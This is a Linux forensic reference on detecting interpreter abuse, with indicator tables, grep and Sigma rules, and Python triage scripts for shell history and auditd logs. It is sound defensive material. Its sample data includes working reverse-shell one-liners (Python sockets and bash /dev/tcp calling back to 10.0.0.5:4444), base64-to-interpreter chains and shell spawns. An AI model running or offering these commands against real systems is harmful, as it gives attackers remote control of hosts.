This note documents detection patterns related to Interpreter Abuse on Linux systems.
Direct Indicators
| Source | Grep Pattern / Artifact | Meaning | Forensic Value | Notes |
|---|---|---|---|---|
| Shell history | python -c | Inline code execution | Critical | Very common payload launcher. |
| Shell history | python3 -c | Inline Python execution | Critical | Common reverse shell pattern. |
| Shell history | perl -e | Inline Perl payload | Critical | GTFOBins-style execution. |
| Shell history | ruby -e | Inline Ruby payload | High | Less common but powerful. |
| Shell history | awk 'BEGIN | Inline awk execution | Critical | Strong GTFOBins indicator. |
| Shell history | php -r | Inline PHP execution | Critical | Web/server abuse pattern. |
| Shell history | bash -c | Wrapped inline execution | High | Common launcher wrapper, but also ubiquitous in legitimate scripts, cron jobs and systemd units; judge by the wrapped command, not the wrapper. |
| Shell history | sh -c | Minimal inline execution | High | Often nested in payloads. |
| Shell history | /dev/tcp/ | Reverse shell through interpreter | Critical | Strong malicious signal; a bash feature, not a real device node, so it only works from bash. |
| Shell history | base64 -d piped into an interpreter | Obfuscated execution | Critical | Mature operator pattern. |
| auditd | execve of an interpreter binary (SYSCALL + EXECVE records) | Process attribution | Critical | Best attribution if enabled: argv, uid, auid and parent pid are recorded. |
| Process tree / memory | Interpreter running with no script file on its command line | Scriptless execution | Critical | Memory-light tradecraft; there is no file to recover, so capture the live process before it exits. |
Indirect Indicators
| Indicator | What To Look For | Forensic Value | Notes |
|---|---|---|---|
| Interpreter use immediately after foothold | Payload stage | Critical | Strong intrusion sequence. |
| Base64 then interpreter | Obfuscated execution | Critical | Mature operator signal. |
| Interpreter under service account | Suspicious context | Critical | Often exploitation shell. |
| Reverse shell via Python/Perl | Active C2 | Critical | Very high severity. |
| No script file but interpreter activity | Fileless execution | Critical | Strong stealth clue. |
Common Tools
| Tool | Usage |
|---|---|
| Python | Inline payload execution. |
| Perl | GTFOBins execution. |
| Ruby | Inline code. |
| Awk | Lightweight code execution. |
| PHP | Server-side payloads. |
| Bash | Wrapper execution. |
Relevant Artifacts
| Artifact | Path / Command | Forensic Value | Notes |
|---|---|---|---|
| Shell history | ~/.bash_history, ~/.zsh_history | Critical | Primary evidence, but written only on clean shell exit and trivially suppressed (unset HISTFILE, HISTSIZE=0, a leading space under HISTCONTROL=ignorespace); an empty or truncated history on an active account is itself worth noting. |
| Audit logs | /var/log/audit/audit.log | Critical | Process attribution. |
| Process tree | ps auxf | Critical | Parent-child linkage. |
| Temp dirs | /tmp, /dev/shm | High | Related staging often nearby. |
MITRE ATT&CK References
- T1059 Command and Scripting Interpreter
- T1059.006 Python
- T1059.004 Unix Shell
Decision Tree
- Which interpreter used?
- Inline code or wrapper?
- Obfuscated?
- Reverse shell or payload?
- Which user context?
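The decision tree above, applied to history lines. This is an added example, not part of the original note: it answers the five questions (interpreter, inline or wrapper, obfuscated, reverse shell, user context) for each line of a constructed .bash_history excerpt and maps the answers to the severities used in the indicator tables. The service-account list and the sample history are assumptions.

```python
"""Walk the interpreter-abuse decision tree over shell-history lines (added example)."""
import re

# Inline-code flags per interpreter family: python -c, perl -e, ruby -e, php -r, awk 'BEGIN.
INLINE = re.compile(r"\b(?P<interp>python[0-9.]*|perl|ruby|php|[gm]?awk)\s+(?P<flag>-c|-e|-r|'BEGIN)")
EXPECTED_FLAG = {"python": "-c", "perl": "-e", "ruby": "-e", "php": "-r", "awk": "'BEGIN"}
WRAPPER = re.compile(r"\b(?P<interp>bash|sh|dash)\s+-c\b")
LEADING = re.compile(r"^\s*(?:sudo\s+)?(?P<interp>bash|sh|dash|python[0-9.]*|perl|ruby|php)\b")
# Reverse-shell idioms typed inline: bash /dev/tcp redirection or socket calls in the payload.
REVSHELL = re.compile(r"/dev/tcp/|socket\.socket\(|IO::Socket|TCPSocket|fsockopen\(")
# base64 -d / --decode output piped straight into an interpreter (code arrives on stdin).
DECODE_PIPE = re.compile(r"base64\s+(?:-d|--decode)\b[^|]*\|\s*(?P<interp>python[0-9.]*|perl|ruby|php|bash|sh)\b")
# Assumed service accounts for the sample host; derive them from /etc/passwd on a real box.
SERVICE_ACCOUNTS = {"www-data", "apache", "nginx", "postgres", "mysql", "tomcat"}


def family(name):
    """Collapse python3.11 -> python and gawk/mawk -> awk for the flag lookup."""
    if name.startswith("python"):
        return "python"
    return "awk" if name.endswith("awk") else name


def triage(line, user="unknown"):
    """Classify one history line; returns None when it is not interpreter-related."""
    inline = next((m for m in INLINE.finditer(line)
                   if EXPECTED_FLAG[family(m.group("interp"))] == m.group("flag")), None)
    wrapper = WRAPPER.search(line)
    decode = DECODE_PIPE.search(line)
    revshell = REVSHELL.search(line) is not None
    if not (inline or wrapper or decode or revshell):
        return None
    if inline:
        interp, mode = inline.group("interp"), "inline"
    elif decode:
        interp, mode = decode.group("interp"), "stdin"
    elif wrapper:
        interp, mode = wrapper.group("interp"), "wrapper"
    else:
        lead = LEADING.match(line)
        interp, mode = (lead.group("interp") if lead else None), "other"
    # Severity as in the indicator tables: reverse shell or decode chain is critical,
    # inline code high, a bare wrapper medium; anything under a service account is critical.
    if revshell or decode:
        severity = "critical"
    elif mode == "inline":
        severity = "high"
    else:
        severity = "medium"
    if user in SERVICE_ACCOUNTS:
        severity = "critical"
    return {"line": line, "user": user, "interpreter": interp, "mode": mode,
            "obfuscated": decode is not None, "reverse_shell": revshell, "severity": severity}


def scan_history(text, user="unknown"):
    """Triage every line of a history file; user is the file owner (taken from the path)."""
    return [f for f in (triage(l, user) for l in text.splitlines()) if f]


def severity_counts(findings):
    counts = {}
    for f in findings:
        counts[f["severity"]] = counts.get(f["severity"], 0) + 1
    return counts


# Constructed .bash_history excerpt mixing benign commands with the indicators from the tables.
SAMPLE_HISTORY = """\
ls -la
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("10.0.0.5",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
echo aW1wb3J0IG9z | base64 -d | python3
perl -e 'print "hi\\n"'
bash -c 'id'
bash -i >& /dev/tcp/10.0.0.5/4444 0>&1
awk 'BEGIN {system("/bin/sh")}'
git status
"""

if __name__ == "__main__":
    for f in scan_history(SAMPLE_HISTORY, user="alice"):
        print(f"{f['severity']:<8} {f['mode']:<8} {f['interpreter']!s:<8} {f['line'][:60]}")
```

Run against the sample as user alice it yields six findings (three critical, two high, one medium); run as www-data every one of them is critical, which is the "interpreter under service account" row of the indirect indicators. The stdin mode covers the base64 case that a plain grep for "python -c" misses, because there is no -c at all.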
Example Detection Templates
Grep
grep -HnE "python[0-9.]* -c|perl -e|ruby -e|awk +'BEGIN|php -r|bash -c|sh -c|/dev/tcp/|base64 +(-d|--decode)" /home/*/.bash_history /root/.bash_history /home/*/.zsh_history /root/.zsh_history 2>/dev/null
Journalctl
journalctl -o cat | grep -E "python[0-9.]* -c|perl -e|ruby -e|php -r|/dev/tcp/"
(Command lines only reach the journal if audit execve records are forwarded to it; grepping the journal for bare interpreter names matches every service written in Python or Perl and is too noisy to triage. With auditd running, query the audit trail directly with ausearch instead.)
Process Inspection
ps auxf | grep -E "[p]ython|[p]erl|[r]uby|[p]hp"
(The bracketed first letter stops grep from matching its own command line; keep the -f forest view so the parent of each interpreter is visible, and read /proc/<pid>/cmdline for the full argv when ps truncates it.)
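Auditd
Attribution from the audit trail, as an added example that is not part of the original note. It assumes execve auditing is enabled with a rule such as `-a always,exit -F arch=b64 -S execve -F exe=/usr/bin/python3 -k interpreter` (one per interpreter binary; the key name is an assumption), joins each SYSCALL record to its EXECVE record by audit serial, decodes the hex-encoded argv entries auditd emits for arguments containing spaces or quotes, and flags inline or wrapper execution together with uid, auid and parent pid. The log excerpt and the service-uid map are constructed.

```python
"""Reconstruct and attribute inline interpreter execution from auditd records (added example)."""
import re

UNSET_AUID = "4294967295"           # auid when the process has no login session (daemon-spawned)
SERVICE_UIDS = {"33": "www-data"}   # assumed for the sample host; read /etc/passwd on a real one

HEADER = re.compile(r"^type=(\w+) msg=audit\(([\d.]+):(\d+)\): (.*)$")
KV = re.compile(r'(\w+)=("[^"]*"|\S+)')
HEX = re.compile(r"^[0-9A-F]+$")
INLINE_FLAG = {"python": "-c", "perl": "-e", "ruby": "-e", "php": "-r"}
REVSHELL = re.compile(r"/dev/tcp/|socket\.socket\(|IO::Socket|TCPSocket|fsockopen\(")
DECODE_PIPE = re.compile(r"base64\s+(?:-d|--decode)\b[^|]*\|")


def decode_arg(raw):
    """Quoted values are literal; unquoted uppercase hex is auditd's encoding of raw bytes."""
    if raw.startswith('"'):
        return raw[1:-1]
    if HEX.match(raw) and len(raw) % 2 == 0:
        return bytes.fromhex(raw).decode("utf-8", "replace")
    return raw


def parse_events(log):
    """Join SYSCALL and EXECVE records that share an audit serial into one event."""
    events = {}
    for line in log.splitlines():
        m = HEADER.match(line)
        if not m:
            continue
        rtype, ts, serial, body = m.groups()
        ev = events.setdefault(serial, {"serial": int(serial), "ts": ts, "argv": []})
        fields = dict(KV.findall(body))
        if rtype == "SYSCALL":
            for k in ("auid", "uid", "pid", "ppid", "comm", "exe", "key"):
                ev[k] = fields.get(k, "").strip('"')
        elif rtype == "EXECVE":
            ev["argv"] = [decode_arg(fields[f"a{i}"]) for i in range(int(fields["argc"]))]
    return sorted(events.values(), key=lambda e: e["serial"])


def family(argv0):
    base = argv0.rsplit("/", 1)[-1]
    return "python" if base.startswith("python") else base


def classify(ev):
    """Flag inline (-c/-e/-r) or wrapper (sh -c) execution and attribute it."""
    argv = ev["argv"]
    if not argv:
        return None
    fam = family(argv[0])
    cmdline = " ".join(argv)
    # The flag may follow other options (python3 -u -c ...), so scan all of argv[1:].
    inline = INLINE_FLAG.get(fam) in argv[1:]
    wrapper = fam in ("bash", "sh", "dash") and "-c" in argv[1:]
    if not (inline or wrapper):
        return None
    reasons = []
    if REVSHELL.search(cmdline):
        reasons.append("reverse shell signature")
    if DECODE_PIPE.search(cmdline):
        reasons.append("base64 decode piped to interpreter")
    if ev.get("auid") == UNSET_AUID or ev.get("uid") in SERVICE_UIDS:
        reasons.append("no login session / service account")   # typical exploitation-shell context
    severity = "critical" if reasons else ("high" if inline else "medium")
    return {"serial": ev["serial"], "severity": severity, "reasons": reasons, "cmdline": cmdline,
            "uid": ev.get("uid"), "auid": ev.get("auid"), "ppid": ev.get("ppid"), "exe": ev.get("exe")}


def detect(log):
    return [f for f in (classify(e) for e in parse_events(log)) if f]


def hexarg(s):
    """Encode an argv entry the way auditd does for values with spaces or quotes."""
    return s.encode().hex().upper()


# Constructed audit.log excerpt: four execve events, the first with an extra CWD record.
SAMPLE_LOG = "\n".join([
    'type=SYSCALL msg=audit(1700000000.101:2001): arch=c000003e syscall=59 success=yes exit=0 items=2 ppid=812 pid=4410 auid=4294967295 uid=33 gid=33 euid=33 tty=(none) ses=4294967295 comm="python3" exe="/usr/bin/python3.11" key="interpreter"',
    'type=EXECVE msg=audit(1700000000.101:2001): argc=3 a0="python3" a1="-c" a2=' + hexarg("import os;os.system('id')"),
    'type=CWD msg=audit(1700000000.101:2001): cwd="/var/www/html"',
    'type=SYSCALL msg=audit(1700000000.205:2002): arch=c000003e syscall=59 success=yes exit=0 items=2 ppid=2200 pid=2201 auid=1000 uid=1000 gid=1000 euid=1000 tty=pts0 ses=3 comm="python3" exe="/usr/bin/python3.11" key="interpreter"',
    'type=EXECVE msg=audit(1700000000.205:2002): argc=2 a0="python3" a1="/opt/app/run.py"',
    'type=SYSCALL msg=audit(1700000000.310:2003): arch=c000003e syscall=59 success=yes exit=0 items=2 ppid=2200 pid=2250 auid=1000 uid=1000 gid=1000 euid=1000 tty=pts0 ses=3 comm="perl" exe="/usr/bin/perl" key="interpreter"',
    'type=EXECVE msg=audit(1700000000.310:2003): argc=3 a0="perl" a1="-e" a2=' + hexarg('print "hi\\n"'),
    'type=SYSCALL msg=audit(1700000000.420:2004): arch=c000003e syscall=59 success=yes exit=0 items=2 ppid=2300 pid=2301 auid=1000 uid=0 gid=0 euid=0 tty=pts0 ses=3 comm="bash" exe="/usr/bin/bash" key="interpreter"',
    'type=EXECVE msg=audit(1700000000.420:2004): argc=3 a0="bash" a1="-c" a2=' + hexarg("echo aWQ= | base64 -d | sh"),
])

if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f"{f['serial']} {f['severity']:<8} uid={f['uid']} auid={f['auid']} ppid={f['ppid']} {f['cmdline']}")
```

Event 2001 is the web-server case: uid 33 with an unset auid means no login session ever owned the process, so the python3 -c came from the daemon itself. Event 2002 runs a script file and is not flagged, 2003 is a user's inline perl (high), and 2004 is root via sudo (auid still 1000) decoding a payload into sh (critical). The auid is what a history file can never give you.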
Sigma
title: Linux Interpreter Abuse
id: linux-interpreter-abuse
status: experimental
description: Detects inline interpreter execution (python -c, perl -e, ruby -e, php -r) and bash /dev/tcp reverse shells in Linux log messages
logsource:
    product: linux
detection:
    selection_keywords:
        message|contains:
            - 'python -c'
            - 'python3 -c'
            - 'perl -e'
            - 'ruby -e'
            - 'php -r'
            - '/dev/tcp/'
    condition: selection_keywords
falsepositives:
    - Administrative one-liners and package build or post-install scripts
level: high
tags:
    - attack.execution
    - attack.t1059
Mitigation & Hardening
| Control Area | Mitigation | Effectiveness | Notes |
|---|---|---|---|
| Auditd | Track interpreter execution with an execve rule per interpreter binary (e.g. -a always,exit -F arch=b64 -S execve -F exe=/usr/bin/python3 -k interpreter, plus an arch=b32 twin on multiarch hosts) | High | Strong attribution: argv, uid, auid and parent pid are logged for every launch, including scriptless ones. |
| Restrict interpreters | Remove unused runtimes | High | Shrinks abuse surface. |
| Egress control | Block callback paths | Critical | Reduces shell success. |